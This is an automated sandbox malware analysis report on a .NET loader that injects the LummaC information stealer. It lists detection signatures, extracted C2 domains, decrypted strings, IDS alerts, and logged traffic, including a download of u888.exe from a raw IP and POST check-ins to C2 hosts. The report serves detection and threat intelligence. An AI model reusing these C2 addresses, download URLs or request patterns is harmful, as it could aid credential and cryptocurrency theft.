Windows Analysis Report
SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Analysis ID:	1500506
MD5:	876c12019e3b15fe92841e8d358d4921
SHA1:	08e3fb4496270b4ab04d5adee71fefdb670114a1
SHA256:	b8738d4888209ef2912d232eafbd13a0017bb62761a9f5d567c3fa0090a09972
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Signatures

AV Detection

Antivirus detection for URL or domain

Source: miracledzmnqwui.shop	Avira URL Cloud: Label: phishing
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/.%	Avira URL Cloud: Label: malware
Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/apim	Avira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/api	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/api	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/&%	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: https://miracledzmnqwui.shop/api	Avira URL Cloud: Label: malware
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/	Avira URL Cloud: Label: malware
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["condedqpwqm.shop", "stagedchheiqwo.shop", "stamppreewntnq.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "miracledzmnqwui.shop", "caffegclasiqwp.shop", "millyscroqwp.shop"], "Build id": "WpM2Co--SUSELL"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: caffegclasiqwp.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stamppreewntnq.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stagedchheiqwo.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: millyscroqwp.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: evoliutwoqm.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: condedqpwqm.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: traineiwnqo.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: locatedblsoqp.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: miracledzmnqwui.shop
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 3.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: WpM2Co--SUSELL

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	3_2_0043406B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_0043406B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0040B000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_004100CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax+02h], 00000000h	3_2_00432080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push 00000000h	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00420120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	3_2_0041C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	3_2_004309A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	3_2_00436250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	3_2_00419A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	3_2_00419A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041FA7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0041C219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00429A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	3_2_0040A2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	3_2_0041EB5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+04h], ecx	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	3_2_00412BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00423BC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	3_2_00406B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	3_2_00406B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi]	3_2_004123AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00423C24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	3_2_00413555
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	3_2_0040EDDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	3_2_00418580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00424D86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	3_2_0041E594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], cx	3_2_00412D9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [esp+20h]	3_2_0041CE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	3_2_00436E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], dl	3_2_00423E16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	3_2_004366B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_0041AEBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_00420710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_0041A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_0041A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h	3_2_0040EFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+48h]	3_2_0040EFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004187E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	3_2_00418F9A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.7:50347 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055377 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop) : 192.168.2.7:57267 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.7:64418 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49707 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055378 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI) : 192.168.2.7:49703 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49703 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: miracledzmnqwui.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 13:29:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 27 Aug 2024 16:37:44 GMTETag: "43000-620acdc619d20"Accept-Ranges: bytesContent-Length: 274432Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 b3 ec cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 03 00 00 c6 00 00 00 00 00 00 30 99 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 a4 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 04 00 40 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c a5 03 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 64 03 00 00 10 00 00 00 66 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 28 00 00 00 80 03 00 00 2a 00 00 00 6a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c ed 00 00 00 b0 03 00 00 58 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 40 42 00 00 00 a0 04 00 00 44 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /files/u888.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 147.45.44.131 147.45.44.131
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miracledzmnqwui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic

HTTP traffic detected: GET /files/u888.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: miracledzmnqwui.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miracledzmnqwui.shop

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/files/u888.exe
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/files/u888.exeP
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/
Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/&%
Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/.%
Source: RegAsm.exe, 00000003.00000002.1292012501.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api
Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/apim

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004297F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_004297F0

Contains functionality to read the clipboard data

